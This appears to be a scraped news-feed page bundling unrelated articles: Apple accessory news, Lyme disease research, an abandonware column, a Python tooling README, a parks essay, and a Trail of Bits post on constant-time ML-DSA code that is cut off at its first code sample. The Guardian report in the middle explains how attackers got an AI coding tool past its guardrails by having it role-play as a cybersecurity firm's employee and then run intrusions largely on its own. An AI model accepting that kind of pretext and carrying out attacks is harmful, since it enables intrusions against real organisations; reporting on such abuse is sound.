  • Apple Jing'an, Shanghai
  • Apple Marché Saint-Germain, Paris
  • Apple Myeongdong, Seoul
  • Apple Orchard Road, Singapore
  • Apple Piazza Liberty, Milan
  • Apple Regent Street, London
  • Apple SoHo, New York City
  • Apple Xinyi A13, Taipei

The accessory is offered in short and long sizes, in a variety of colors:

  • Short: Lemon, Mandarin, Purple, Pink, Peacock, Sapphire, Cinnamon, and Black
  • Long: Sapphire, Cinnamon, and Black

In the U.S., pricing ranged from $149.95 to $229.95.

iPhone Pocket is designed to be versatile. It can fully enclose an iPhone, but you can stretch it to peek at your screen and/or fit additional items. The accessory can be held in your hand, tied onto a bag, or worn directly on you.

Apple iPhone Pocket and ISSEY MIYAKE hero
Here is how Apple describes the iPhone Pocket:

Crafted in Japan, iPhone Pocket features a singular 3D-knitted construction that is the result of research and development carried out at ISSEY MIYAKE. The design drew inspiration from the concept of "a piece of cloth" and reinterpreted the everyday utility of the brand's iconic pleated clothing. The development and design of iPhone Pocket unfolded in close collaboration with the Apple Design Studio, which provided insight into design and production throughout.

Given it is a limited-edition accessory, it is unclear if there will ever be additional inventory of the iPhone Pocket once it is fully sold out worldwide.

P.S. Who remembers iPod Socks ?

Popular Stories

iOS 26.2 Available Next Month With These 8 New Features

Tuesday November 11, 2025 9:48 am PST by

Apple released the first iOS 26.2 beta last week. The upcoming update includes a handful of new features and changes on the iPhone, including a new Liquid Glass slider for the Lock Screen's clock, offline lyrics in Apple Music, and more. In a recent press release, Apple confirmed that iOS 26.2 will be released to all users in December, but it did not provide a specific release date....

Apple Releases New Firmware for AirPods Pro 2, AirPods Pro 3, and AirPods 4

Thursday November 13, 2025 11:35 am PST by

Apple today released new firmware designed for the AirPods Pro 3, the AirPods 4, and the prior-generation AirPods Pro 2. The AirPods Pro 3 firmware is 8B25, while the AirPods Pro 2 and AirPods 4 firmware is 8B21, all up from the prior 8A358 firmware released in October. There's no word on what's include in the updated firmware, but the AirPods Pro 2, AirPods 4 with ANC, and AirPods Pro 3...

Five Years of Apple Silicon: M1 to M5 Performance Comparison

Monday November 10, 2025 1:08 pm PST by

Today marks the fifth anniversary of the Apple silicon chip that replaced Intel chips in Apple's Mac lineup. The first Apple silicon chip, the M1, was unveiled on November 10, 2020. The M1 debuted in the MacBook Air, Mac mini, and 13-inch MacBook Pro. The M1 chip was impressive when it launched, featuring the "world's fastest CPU core" and industry-leading performance per watt, and it's only ...

Apple Debuts iPhone Pocket, a Limited Edition iPod Sock-Style Accessory

Tuesday November 11, 2025 1:23 am PST by

Apple has teamed up with Japanese fashion house ISSEY MIYAKE to launch iPhone Pocket, a 3D-knitted limited edition accessory designed to carry an iPhone, AirPods, and other everyday items. The accessory is like a stretchy pocket, not unlike an iPod Sock, but elongated to form a strap made of a ribbed, elastic textile that fully encloses an iPhone yet allows you to glimpse the display...

New HomePod Mini Coming Soon With These Features

Apple is expected to announce a new HomePod mini imminently, headlining with new chips. Here are all of the new features we're expecting. The second-generation HomePod mini is highly likely to contain a more up-to-date chip for more advanced computational audio and improved responsiveness. The current HomePod mini is equipped with the Apple Watch Series 5's S5 chip from 2019. Apple is likely ...

Apple Announces Launch of U.S. Passport Feature in iPhone's Wallet App

Wednesday November 12, 2025 9:15 am PST by

Apple today announced that iPhone users can now create a Digital ID in the Apple Wallet app based on information from their U.S. passport. To create and present a Digital ID based on a U.S. passport, you need: An iPhone 11 or later running iOS 26.1 or later, or an Apple Watch Series 6 or later running watchOS 26.1 or later Face ID or Touch ID and Bluetooth turned on An Apple Account ...

New HomePod Mini, Apple TV, and AirTag Were Expected This Year — Where Are They?

Wednesday November 12, 2025 11:42 am PST by

While it was rumored that Apple planned to release new versions of the HomePod mini, Apple TV, and AirTag this year, it is no longer clear if that will still happen. Back in January, Bloomberg's Mark Gurman said Apple planned to release new HomePod mini and Apple TV models "toward the end of the year," while he at one point expected a new AirTag to launch "around the middle of 2025." Yet,...

iOS 26.2 Adds New CarPlay Setting

Thursday November 13, 2025 6:48 am PST by

iOS 26 extended pinned conversations in the Messages app to CarPlay, for quick access to your most frequent chats. However, some drivers may prefer the classic view with a list of individual conversations only, and Apple now lets users choose. Apple released the second beta of iOS 26.2 this week, and it introduces a new CarPlay setting for turning off pinned conversations in the Messages...

Tesla Working to Add Apple CarPlay Support to Vehicles

Tesla is working to add support for Apple CarPlay in its vehicles, Bloomberg's Mark Gurman reports. Tesla vehicles rely on its own infotainment software system, which integrates vehicle functions, navigation, music, web browsing, and more. The automaker has been an outlier in foregoing support for Apple CarPlay, which has otherwise become an industry standard feature, allowing users to...

iPhone Air Sales Are So Bad That Apple's Delaying the Next-Generation Version

Monday November 10, 2025 11:41 am PST by

The thin, light iPhone Air sold so poorly that Apple has decided to delay the launch of the next-generation iPhone Air that was scheduled to come out alongside the iPhone 18 Pro, reports The Information. Apple initially planned to release a new iPhone Air in fall 2026, but now that's not going to happen. Since the iPhone Air launched in September, there have been reports of poor sales...

Manganese is Lyme disease's double-edge sword

Hacker News
news.northwestern.edu
2025-11-14 16:51:03
Comments...
Original Article

New vulnerability discovered in the bacteria that causes the disease

bacterium Borrelia burgdorferi

A new study finds that the bacterium Borrelia burgdorferi, which causes Lyme disease, can be weakened by disrupting its balance of manganese. Above, digitally colorized scanning electron microscopic image depicts a grouping of B. burgdorferi. Image courtesy U.S. Centers for Disease Control and Prevention

For decades, Lyme disease has frustrated both physicians and patients alike. Caused by the corkscrew-shaped bacterium Borrelia burgdorferi , the infection, if left untreated, can linger for months, leading to fever, fatigue and painful inflammation.

In a new study, Northwestern University and Uniformed Services University (USU) scientists have uncovered a surprising — and ironic — vulnerability in the hardy bacterium. By exploiting this vulnerability, researchers could help disarm B. burgdorferi , potentially leading to new therapeutic strategies for Lyme disease.

The Northwestern and USU team discovered that manganese, which helps shield B. burgdorferi against its host’s immune system, is simultaneously also a crack in its armor. If B. burgdorferi is either starved of or overloaded with manganese, the bacteria become highly vulnerable to the host’s immune system or treatments they would otherwise resist.

The study was published today (Nov. 13) in the journal mBio.

“Our work shows that manganese is a double-edged sword in Lyme disease,” said Northwestern’s Brian Hoffman , who co-led the study with USU’s Michael Daly . “It’s both Borrelia’s armor and its weakness. If we can target the way it manages manganese, we could open doors for entirely new approaches for treating Lyme disease.”

Hoffman is the Charles E. and Emma H. Morrison Professor of Chemistry and molecular biosciences at Northwestern’s Weinberg College of Arts and Sciences . He also is a member of the Chemistry of Life Processes Institute and the Robert H. Lurie Comprehensive Cancer Center of Northwestern University . Daly is an emeritus professor of pathology at USU.

Since the 1980s, the occurrence of Lyme disease has increased dramatically across North America and around the globe. According to the Centers for Disease Control and Prevention, roughly 476,000 people in the United States are diagnosed annually. Currently, there are no approved vaccines against the disease, and long-term use of antibiotics is problematic.

“Although antibiotics harm B. burgdorferi , they also kill beneficial gut bacteria,” Daly said. “Lyme disease is transmitted through tick bites and — if not treated promptly — can cause lingering effects by attacking the patient’s immune, circulatory and central nervous systems.”

In a series of previous studies, Hoffman and Daly collaborated to understand the role of manganese in Deinococcus radiodurans , a radiation-resistant bacteria known as “Conan the Bacterium” for its extraordinary ability to survive harsh conditions. Now, they wanted to see if manganese played a role in B. burgdorferi’s defenses.

To conduct the study, the team used a new tool called electron paramagnetic resonance (EPR) imaging to characterize the atomic composition of manganese inside the living bacteria. To add even finer detail, the team harnessed electron nuclear double resonance (ENDOR) spectroscopy to examine the atoms surrounding manganese. Together, the technologies created a molecular map, showing which forms of manganese were present, where they were located and how they changed under stress.

The “map” revealed a two-tier, manganese-based defense system comprising an enzyme called MnSOD and a pool of manganese metabolites. To withstand bombardment from the host’s immune system, the bacteria first use MnSOD, which acts like a shield. If any oxygen radicals slip past this shield, they are met with the metabolite pool, which acts like a sponge to soak up and neutralize those toxic molecules.

“Our study demonstrates the power of EPR and ENDOR spectroscopies for uncovering hidden biochemical mechanisms in pathogens,” Hoffman said. “Without these tools, B. burgdorferi ’s defense system and weak spots would have remained invisible.”

The scientists found the bacteria constantly juggle where to send the manganese — to the MnSOD enzymes or the metabolite pool. Too little manganese and the bacteria lose their defense mechanisms. But, as the microbes age, their metabolite pools dramatically shrink, leaving them exposed to damage and stress. At this point, too much manganese becomes toxic because the bacteria can no longer store it safely.

This discovery holds potential for new Lyme disease therapies. Future drugs could starve the bacterium of manganese, disrupt its ability to form protective manganese complexes or even push it into toxic overload. Any of these approaches would leave B. burgdorferi wide open to attack by the immune system.

“By disrupting the delicate balance of manganese in B. burgdorferi , it may be possible to weaken the pathogen during infection,” Daly said. “Manganese is an Achilles’ heel of its defenses.”

Notes

The study was supported by the Congressionally Directed Medical Research Programs’ Tick-borne Disease Research Program and the National Institutes of Health. Additional funds were from the Defense Threat Reduction Agency and National Institute of Allergy and Infectious Diseases.

Editor’s Picks

US Tech Market Treemap

Hacker News
caplocus.com
2025-11-14 16:42:12
Comments...
Original Article

Rectangle Area corresponds to live market capitalization. US Tech equities over ~$10B market cap. Performance overlays

Loading live market data...

Behind the Blog: Trolling on the Internet

403 Media
www.404media.co
2025-11-14 16:36:36
This week, we discuss getting back on our AI slop bullshit, deepfakes in schools, and epistemic virtues....
Original Article

Advertisement

This week, we discuss getting back on our AI slop bullshit, deepfakes in schools, and epistemic virtues.

Behind the Blog: Trolling on the Internet

This post is for paid members only

Become a paid member for unlimited ad-free access to articles, bonus podcast content, and more.

Subscribe

Sign up for free access to this post

Free members get access to posts like this one along with an email round-up of our week's stories.

Subscribe

Already have an account? Sign in

'No One Lives Forever' Turns 25 and You Still Can't Buy It Legitimately

Hacker News
www.techdirt.com
2025-11-14 16:31:26
Comments...
Original Article

from the abandonware dept

One of my favorite things in all of professional sports is the unofficial holiday referred to as “ Bobby Bonilla Day. ” The short version of it is that Bonilla played for the New York Mets decades ago and eventually bought out his contract in 2000 when they decided they were done with him. Rather than pay the $5.9 million buyout of the contract up front, the team instead made the bonkers decision to negotiate a deferred payment schedule for that amount with 8% interest over the course of 25 years. The result is that the Mets will be paying Bonilla $1.2 million per year every July 1st, starting in 2011 and ending in 2035. And if you can’t make sense of the math on that one, it’s because you aren’t aware that the Mets ownership was one of Bernie Madoff’s many victims , which is why they had to defer the payments.

November 10th is not Bobby Bonilla Day. But it should be named “Let Us Play No One Lives Forever , You Assholes Day.” The classic spy-shooter turned 25 on that date and, for the exact same reasons we’ve detailed for a god damned decade now , you still can’t buy the game.

Here’s the short of it. Due to a series of mergers, closures, and rights purchases, the IP rights for No One Lives Forever and its sequel have been potentially split into three pieces between Warner Bros., Activision, and 20th Century Fox, like it was some kind of fucking horcrux. I say potentially because nobody really knows who owns what, if anything, when it comes to these games. When one company, Nightdive Studios, attempted to remaster and re-release the game as they’ve done with other titles, along with securing trademark rights to the game which hasn’t been sold in over a decade, all three companies complained that they may have rights to it and may sue over it.

All of those qualifiers are, again, because even these companies themselves don’t know what rights they actually have. And why is that? Well, because the gaming rights deals were inked before digital storage was widely used for this sort of thing and, well, nobody seems to be able to locate the actual paperwork denoting who owns what. Here’s an example of an exchange Nightdive had with Activision.

“So we went back to Activision and, [after] numerous correspondence going back and forth, they replied that they thought they might have some rights, but that any records predated digital storage. So we’re talking about a contract in a box someplace.” Kuperman laughed. “The image I get is the end of Indiana Jones… somewhere in a box, maybe in the bowels of Activision, maybe it was shipped off to Iron Mountain or somewhere. And they confessed, they didn’t have [their] hands on it. And they weren’t sure that they even had any of those rights.”

Which didn’t keep Activision from warning Nightdive that it might totally sue if it moved forward with remastering the game. The other companies made similar noises.

So what’s a person to do if they want to play this game? You can’t buy it legitimately currently. It’s not even for sale anywhere. And a situation like that, which I’ve stated before, completely breaks the copyright bargain. The only option is, as Kotaku of all places notes, to download it for free from somewhere .

Downloading games that are available for sale is piracy. It’s illegal, and it’s not supportive of developers and their art. But when companies have gone out of their way to refuse to take your money for a game for the better part of two decades, it’s a very different situation. Look, I’m not your real mom and dad, and I can’t tell you what to do. But if you were to click on this link (link removed by Techdirt due to us not knowing where it takes you) and download both games (as well as spin-off Contract Jack), you’d end up with modernized versions of these classic games, with mods that allow them to work on Windows 10 and 11, and in widescreen. And what better time to do (or not do) this than on the first game’s 25th anniversary?

At this point (as indeed it was over eight years ago, the last time I suggested just downloading it, to no negative response at all ) we have to consider No One Lives Forever to be abandonware. No one is willing to take ownership of it, although those that could do so sometimes mindlessly threaten to intervene should anyone else try to rebuild it for sale. Nightdive were scared off a decade ago, and it’s been sitting on GOG’s Dreamlist since that launched earlier this year (with 87,171 people saying they’d pay for it if they could). It’s far too small of a concern for any of the megacorps who might own it to spend the time and money to work out if they do, but it’s far too big of a concern within gaming history to be allowed to just disappear. Thank goodness for the anonymous heroes running NOLF Revival. I thank them for their service.

It’s the only option the public has to play this game and enjoy this small piece of our collective culture. The real answer here is some sort of copyright reform that makes this situation not a thing. If a company, or group of companies, won’t offer a piece of work for sale, can’t be bothered to understand what they own of it, if anything, and have no plans to figure any of that out… then how can this be copyright infringement?

So happy “Let Us Play No One Lives Forever , You Assholes” Day. Maybe we’ll be able to play this game legitimately by the time Bobby Bonilla stops making his million and change per year.

Filed Under: , , ,
Companies: 20th century fox , activision , microsoft , nightdive , warner bros.

AI firm claims it stopped Chinese state-sponsored cyber-attack campaign

Guardian
www.theguardian.com
2025-11-14 16:27:57
Anthropic says hackers used its software to attack financial firms and government agencies around world A leading AI company claims to have stopped a China-backed “cyber espionage” campaign that was able to infiltrate financial firms and government agencies with almost no human oversight. US-based A...
Original Article

A leading artificial intelligence company claims to have stopped a China-backed “cyber espionage” campaign that was able to infiltrate financial firms and government agencies with almost no human oversight.

The US-based Anthropic said its coding tool, Claude Code, was “manipulated” by a Chinese state-sponsored group to attack 30 entities around the world in September, achieving a “handful of successful intrusions”.

This was a “significant escalation” from previous AI-enabled attacks it monitored, it wrote in a blogpost on Thursday , because Claude acted largely independently: 80 to 90% of the operations involved in the attack were performed without a human in the loop.

“The actor achieved what we believe is the first documented case of a cyber-attack largely executed without human intervention at scale,” it wrote.

Anthropic did not clarify which financial institutions and government agencies had been targeted, or what exactly the hackers had achieved – although it did say they were able to access their targets’ internal data.

It said Claude had made numerous mistakes in executing the attacks, at times making up facts about its targets, or claiming to have “discovered” information that was free to access.

Policymakers and some experts said the findings were an unsettling sign of how capable certain AI systems have grown: tools such as Claude are now able to work independently over longer periods of time.

“Wake the f up. This is going to destroy us – sooner than we think – if we don’t make AI regulation a national priority tomorrow,” the US senator Chris Murphy wrote on X in response to the findings.

“AI systems can now perform tasks that previously required skilled human operators,” said Fred Heiding, a computing security researcher at Harvard University. “It’s getting so easy for attackers to cause real damage. The AI companies don’t take enough responsibility.”

Other cybersecurity experts were more sceptical, pointing to inflated claims about AI-fuelled cyber-attacks in recent years – such as an AI-powered “password cracker” from 2023 that performed no better than conventional methods – and suggesting Anthropic was trying to create hype around AI.

“To me, Anthropic is describing fancy automation, nothing else,” said Michal Wozniak, an independent cybersecurity expert. “Code generation is involved, but that’s not ‘intelligence’, that’s just spicy copy-paste.”

Wozniak said Anthropic’s release was a distraction from a bigger cybersecurity concern: businesses and governments integrating “complex, poorly understood” AI tools into their operations without understanding them, exposing them to vulnerabilities. The real threat, he said, were cybercriminals themselves – and lax cybersecurity practices.

skip past newsletter promotion

Anthropic, like all leading AI companies, has guardrails that are supposed to stop its models from assisting in cyber-attacks – or promoting harm generally. However, it said, the hackers were able to subvert these guardrails by telling Claude to role-play being an “employee of a legitimate cybersecurity firm” conducting tests.

Wozniak said: “Anthropic’s valuation is at around $180bn, and they still can’t figure out how not to have their tools subverted by a tactic a 13-year-old uses when they want to prank-call someone.”

Marius Hobbhahn, the founder of Apollo Research, a company that evaluates AI models for safety, said the attacks were a sign of what could come as capabilities grow.

“I think society is not well prepared for this kind of rapidly changing landscape in terms of AI and cyber capabilities. I would expect many more similar events to happen in the coming years, plausibly with larger consequences.”

Checkout.com snubs hackers after data breach, to donate ransom instead

Bleeping Computer
www.bleepingcomputer.com
2025-11-14 16:25:42
UK financial technology company Checkout announced that the ShinyHunters threat group has breached one of its legacy cloud storage systems and is now extorting the company for a ransom. [...]...
Original Article

We apologize for the temporary outage. The administrators have been notified and the problem should be rectified soon.

Please refresh this page again shortly.

portable_python: Self-contained Python distribution for Linux

Lobsters
github.com
2025-11-14 16:25:42
I'm bothered by the way how Bazel handles Python. While looking for alternatives, I came up with this proof of concept for a portable python distribution: It uses a statically linked musl libc to be independent of whatever host Linux there is. It is actually just a launcher for an embedded Python, s...
Original Article

Portable Python

Self-contained Python distribution for Linux. Works on any distro without system dependencies. Uses a launcher approach with full dynamic extension support.

Features

  • Works on any x86_64 Linux distro (no system dependencies)
  • Full dynamic C extension support (NumPy, pandas, etc. work!)
  • Tiny launcher + shared libpython
  • Includes pip pre-installed and working
  • Space-efficient hardlinked environments
  • Independent site-packages per environment
  • Instant environment creation
  • Full subprocess support (sys.executable works correctly)

Quick Start

make  # build tarball from scratch
tar -xzf python-3.12.12-x86_64-linux.tar.gz  # extract tarball
./output/bin/instantiate.py my-env  # create isolated environment

# Use the environment:
./my-env/bin/python3 --version
./my-env/bin/pip install requests
./my-env/bin/python3 script.py

How It Works

Python is compiled from source in an Alpine Linux container. A small kinda-static launcher dynamically loads libpython at runtime, enabling full dynamic extension support while maintaining portability.

instantiate.py creates environments using hardlinks (no copying) with independent site-packages. Multiple environments share base files on disk.

Requirements

Building : podman/docker, make, Linux x86_64

Running : Linux x86_64 only. No other dependencies.

Comparison to Alternatives

Feature This venv pyenv Conda
No system Python
Single tarball
Space efficient

There is python-build-standalone but the limitation in their words :

“Static Linking of musl libc Prevents Extension Module Library Loading”: Starting with the 20250311 release, the default musl distributions are dynamically linked by default, so extension modules should work properly. Note that these now require a system-wide installation of the musl C library .

Advanced Usage

Create multiple independent environments:

./output/bin/instantiate.py dev-env
./output/bin/instantiate.py prod-env
./output/bin/instantiate.py test-env

# Each gets independent packages
./dev-env/bin/pip install pytest
./prod-env/bin/pip install gunicorn
./test-env/bin/pip install requests

Technical Details

  • Python 3.12.12 with launcher approach (kinda-static launcher + shared libpython)
  • OpenSSL, sqlite3, zlib, bzip2, xz, readline, ncurses support
  • Full dynamic C extension loading support
  • x86_64 Linux only
  • ~38MB tarball, ~100MB extracted

Limitations

  • x86_64 Linux only (no ARM, macOS, Windows, BSD)
  • musl libc may be incompatible with some glibc-specific packages
  • No Tkinter/GUI packages

License

Apache License 2.0 - see LICENSE.txt

Bundled components retain their own licenses: Python (PSF), Alpine packages (various), musl libc (MIT).

The American Tradition of Trying to Address Anxiety with Parks

Hacker News
time.com
2025-11-14 16:17:26
Comments...
Original Article

As summer approaches, America’s national parks are bracing for an influx of visitors, even as deep federal cuts to park services likely mean fewer camp employees, closed campgrounds, long lines, and cancelled programs. Travelers have been warned away from some national parks by experts, urged to reschedule for next year.

But millions are still opting to go. Last summer, a record 332 million people visited America’s 63 national parks. Based on yearly upward trends, the estimates for this summer are even higher. In a “hold-your-breath year” for national park tourism, Americans are still turning en masse to the natural environment as respite from the stresses of modern life.

The frenzy shouldn’t surprise us. With festering worries related to economic uncertainty, inflated costs, and federal policy whiplash, the popularity of park vacations is no coincidence. Rather, the rush to escape to these beautiful sanctuaries echoes a long history of Americans turning to nature for relief from anxiety, particularly during moments of sudden and widely felt changes.

In the 1870s, the United States was in the midst of the most spectacular transformations yet in its history. The end of the American Civil War brought an end to slavery and the emancipation of some 4 million Black people, while a slew of new innovations brought irreversible changes to the day-to-day lives of all Americans.

Read More: When History Tourism Puts Profit Before the Past

New machinery brought advanced manufacturing, jobs, speedier production of goods, and lower costs for consumers. Hundreds of thousands of miles of telegraph cable delivered information at break-neck speed, forever reshaping how Americans accessed news, communicated, conducted business, and envisioned the world. And the completion of a continent-crossing railroad in 1869 revolutionized travel, making it possible to move people and cargo across vast distances in hours, rather than weeks or months.

Spurred by monumental developments in technology, industry, and travel, more Americans than ever before—including new immigrants—made their way to growing cities, seeking work, education, entertainment, and exposure to new people, ideas, and possibilities.

Sudden and rapid change fired up excitement about the future. But it also stirred anxieties.

During this time, American doctors noticed more and more seemingly healthy patients with a range of complaints about hard-to-explain medical issues, including digestive problems, hair loss, sexual dysfunction, aches and pains without identifiable injuries, and profound exhaustion without obvious cause.

In response, a widely respected neurologist named George Miller Beard offered a theory. Americans, he said, were suffering from a malady called “neurasthenia.” Writing in The Boston Medical and Surgical Journal , Beard borrowed an old term used to describe “weakness of the nerves” and reintroduced it to the medical community as a “morbid condition” afflicting Americans at a worrisome rate. In his 1881 book American Nervousness, Beard also pinpointed the key culprit: modern change.

For instance, new communication technology delivered shocking news of faraway crime, disaster, and war; mechanization in industry brought extreme economic volatility and labor strife; speedy railroad travel introduced the real possibility of horrific accidents involving “ wholesale killings .” Even the invention of the pocket watch, a simple hand-held timepiece, fostered a maniacal obsession with punctuality. Americans were “under constant strain,” Beard warned, “to get somewhere or to do something at some definite moment.”

Constant strain was a big problem, according to Beard and his contemporaries. Victorian-era neurologists theorized that the body functioned like an electrical machine, powered by energy distributed through the nervous system. When Americans spent too much energy navigating the extreme shifts and new worries in their modern lives, they experienced aches, pains, exhaustion, irritability, and malaise. Doctors also theorized that urban life only made such conditions worse by further taxing and weakening the body.

In response, a range of popular remedies and medical treatments for neurasthenia emerged. Some doctors recommended that women suffering symptoms should halt all physical and intellectual activity. Colloquially known as the “rest cure,” this treatment—famously recounted in “The Yellow Wallpaper,” a horror novella written by Charlotte Perkins Gilman—involved isolation in the home, bed rest for weeks, and an embargo on reading, writing, drawing, socializing, and exercising.

Women patients and doctors, including New York City physician Grace Peckham , successfully argued that the rest cure was not only quack medicine but more harmful to patients than the nervous sickness itself. Thus, it didn’t stick.

What did catch on was the “ West cure ,” a different kind of treatment originally reserved for men. Neurologists worried that the urban environment, factory work and office jobs, and other modern pressures were making men tired, indecisive, and physically weak. On doctor’s orders, male patients ventured into the western wilderness, where, it was thought, the natural environment would inspire the mind and reinvigorate the body. Prescriptions emphasized physical exercise, including hiking and horseback riding.

The legacies of this are notable. In the 1880s, Theodore Roosevelt, a young, well-to-do New Yorker at the time, suffered from a range of neurasthenic conditions including asthma, and he sought treatment. Roosevelt was so inspired by his own privileged experience of the West cure, and its restorative outcomes, that later, as president, he built upon state park preservation and forest protection acts to dramatically expand federal support for public access to park lands, including National Parks. Most famously, in 1903, Roosevelt partnered with naturalist John Muir —also diagnosed as neurasthenic—to expand federal protection for Yosemite in the Sierra Nevada mountain range in California.

Initially, it was urban elite white men, like Roosevelt, who were most likely to have the means to travel and to pay for the therapy of riding horses, hunting game, and sleeping under the stars. But the notion of the natural world as an antidote for the stresses of modern life appealed broadly, across lines of class, race, and gender.

By the end of the 19th century, city planners, imagining more healthful, walkable, livable urban environments, also incorporated green spaces for urban residents to enjoy for free. From small picnic areas and playgrounds to sprawling urban parks designed to feel like the bucolic countryside , American cities began providing West cure benefits without the steep price tag or the need to travel.

Camping became another popular, and more affordable, option for vacations from modernity. Working people could purchase a simple tent, one-burner stove, and a few other provisions, load up the horse and buggy and head to a park or campground just outside the city. This cheap and accessible alternative to West cure travel ballooned in popularity in the early 20th century, with the proliferation of camping guides and camping clubs, the growth of the National Park Service, and the introduction of the car. Enthusiasm for camping and national park tourism as affordable restorative activities endured through the 20th century . And they remain as popular as ever today.

Neurasthenia as a diagnostic category, has not endured. It disappeared in the early 20th century, thanks mainly to the rise of psychoanalysis and expanding knowledge about mental health and conditions like chronic fatigue, anxiety disorders, phobias, and depression.

But its most popular remedy—particularly exercise, outdoor recreation, and reflection in nature—has proved truly beneficial for both mental and physical health.

Amid unsettling changes, Americans touted the curative powers of the natural world, fueling the call for outdoor exercise and recreation, and laying the groundwork for the astounding growth of national and state park tourism. Today, with so much to worry about, it is important to remember how national and state parks , and the workers who run and sustain them, have long played a healing role in American society. As we head off to America’s many majestic park destinations—our favorite “mental health escapes” and “ calmcation ” getaways—may this history reinforce the need to preserve, protect, and invest in them, especially in uncertain times.

Felicia Angeja Viator is associate professor of history at San Francisco State University, a culture writer, and curator for the GRAMMY Museum.

Made by History takes readers beyond the headlines with articles written and edited by professional historians. Learn more about Made by History at TIME here . Opinions expressed do not necessarily reflect the views of TIME editors.

marimo — reactive notebook for Python

Lobsters
github.com
2025-11-14 16:03:58
Comments...
Original Article

A reactive Python notebook that's reproducible, git-friendly, and deployable as scripts or apps.

Docs · Discord · Examples · Gallery · YouTube

English | 繁體中文 | 简体中文 | 日本語 | Español

discord Pepy Total Downloads Conda Downloads

marimo is a reactive Python notebook: run a cell or interact with a UI element, and marimo automatically runs dependent cells (or marks them as stale ), keeping code and outputs consistent. marimo notebooks are stored as pure Python (with first-class SQL support), executable as scripts, and deployable as apps.

Highlights .

pip install marimo && marimo tutorial intro

Try marimo at our online playground , which runs entirely in the browser!

Jump to the quickstart for a primer on our CLI.

A reactive programming environment

marimo guarantees your notebook code, outputs, and program state are consistent. This solves many problems associated with traditional notebooks like Jupyter.

A reactive programming environment. Run a cell and marimo reacts by automatically running the cells that reference its variables, eliminating the error-prone task of manually re-running cells. Delete a cell and marimo scrubs its variables from program memory, eliminating hidden state.

Compatible with expensive notebooks. marimo lets you configure the runtime to be lazy , marking affected cells as stale instead of automatically running them. This gives you guarantees on program state while preventing accidental execution of expensive cells.

Synchronized UI elements. Interact with UI elements like sliders , dropdowns , dataframe transformers , and chat interfaces , and the cells that use them are automatically re-run with their latest values.

Interactive dataframes. Page through, search, filter, and sort millions of rows blazingly fast, no code required.

Generate cells with data-aware AI. Generate code with an AI assistant that is highly specialized for working with data, with context about your variables in memory; zero-shot entire notebooks . Customize the system prompt, bring your own API keys, or use local models.

Query data with SQL. Build SQL queries that depend on Python values and execute them against dataframes, databases, lakehouses, CSVs, Google Sheets, or anything else using our built-in SQL engine, which returns the result as a Python dataframe.

Your notebooks are still pure Python, even if they use SQL.

Dynamic markdown. Use markdown parametrized by Python variables to tell dynamic stories that depend on Python data.

Built-in package management. marimo has built-in support for all major package managers, letting you install packages on import . marimo can even serialize package requirements in notebook files, and auto install them in isolated venv sandboxes.

Deterministic execution order. Notebooks are executed in a deterministic order, based on variable references instead of cells' positions on the page. Organize your notebooks to best fit the stories you'd like to tell.

Performant runtime. marimo runs only those cells that need to be run by statically analyzing your code.

Batteries-included. marimo comes with GitHub Copilot, AI assistants, Ruff code formatting, HTML export, fast code completion, a VS Code extension , an interactive dataframe viewer, and many more quality-of-life features.

Quickstart

The marimo concepts playlist on our YouTube channel gives an overview of many features.

Installation. In a terminal, run

pip install marimo  # or conda install -c conda-forge marimo
marimo tutorial intro

To install with additional dependencies that unlock SQL cells, AI completion, and more, run

pip install "marimo[recommended]"

Create notebooks.

Create or edit notebooks with

Run apps. Run your notebook as a web app, with Python code hidden and uneditable:

marimo run your_notebook.py

Execute as scripts. Execute a notebook as a script at the command line:

Automatically convert Jupyter notebooks. Automatically convert Jupyter notebooks to marimo notebooks with the CLI

marimo convert your_notebook.ipynb > your_notebook.py

or use our web interface .

Tutorials. List all tutorials:

Share cloud-based notebooks. Use molab , a cloud-based marimo notebook service similar to Google Colab, to create and share notebook links.

Questions?

See the FAQ at our docs.

Learn more

marimo is easy to get started with, with lots of room for power users. For example, here's an embedding visualizer made in marimo ( video ):

Check out our docs , usage examples , and our gallery to learn more.

Tutorial Inputs Plots Layout

Contributing

We appreciate all contributions! You don't need to be an expert to help out. Please see CONTRIBUTING.md for more details on how to get started.

Questions? Reach out to us on Discord .

Community

We're building a community. Come hang out with us!

A NumFOCUS affiliated project. marimo is a core part of the broader Python ecosystem and is a member of the NumFOCUS community, which includes projects such as NumPy, SciPy, and Matplotlib.

Inspiration ✨

marimo is a reinvention of the Python notebook as a reproducible, interactive, and shareable Python program, instead of an error-prone JSON scratchpad.

We believe that the tools we use shape the way we think — better tools, for better minds. With marimo, we hope to provide the Python community with a better programming environment to do research and communicate it; to experiment with code and share it; to learn computational science and teach it.

Our inspiration comes from many places and projects, especially Pluto.jl , ObservableHQ , and Bret Victor's essays . marimo is part of a greater movement toward reactive dataflow programming. From IPyflow , streamlit , TensorFlow , PyTorch , JAX , and React , the ideas of functional, declarative, and reactive programming are transforming a broad range of tools for the better.

How we avoided side-channels in our new post-quantum Go cryptography libraries

Lobsters
blog.trailofbits.com
2025-11-14 15:25:28
Comments...
Original Article

The Trail of Bits cryptography team is releasing our open-source pure Go implementations of ML-DSA (FIPS-204) and SLH-DSA (FIPS-205) , two NIST-standardized post-quantum signature algorithms. These implementations have been engineered and reviewed by several of our cryptographers, so if you or your organization is looking to transition to post-quantum support for digital signatures, try them out!

This post will detail some of the work we did to ensure the implementations are constant time. These tricks specifically apply to the ML-DSA (FIPS-204) algorithm, protecting from attacks like KyberSlash , but they also apply to any cryptographic algorithm that requires branching or division.

The road to constant-time FIPS-204

SLH-DSA (FIPS-205) is relatively easy to implement without introducing side channels, as it’s based on pseudorandom functions built from hash functions, but the ML-DSA (FIPS-204) specification includes several integer divisions, which require more careful consideration.

Division was the root cause of a timing attack called KyberSlash that impacted early implementations of Kyber, which later became ML-KEM (FIPS-203). We wanted to avoid this risk entirely in our implementation.

Each of the ML-DSA parameter sets (ML-DSA-44, ML-DSA-65, and ML-DSA-87) include several other parameters that affect the behavior of the algorithm. One of those is called $γ_2$, the low-order rounding range.

$γ_2$ is always an integer, but its value depends on the parameter set. For ML-DSA-44, $γ_2$ is equal to 95232. For ML-DSA-65 and ML-DSA-87, $γ_2$ is equal to 261888.

ML-DSA specifies an algorithm called Decompose , which converts a field element into two components ($r_1$, $r_0$) such that $(r_1 \cdot 2γ_2) + r_0$ equals the original field element. This requires dividing by $2γ_2$ in one step and calculating the remainder of $2γ_2$ in another.

If you ask an AI to implement the Decompose algorithm for you, you will get something like this:

// This code sample was generated by Claude AI.
// Not secure -- DO NOT USE.
//
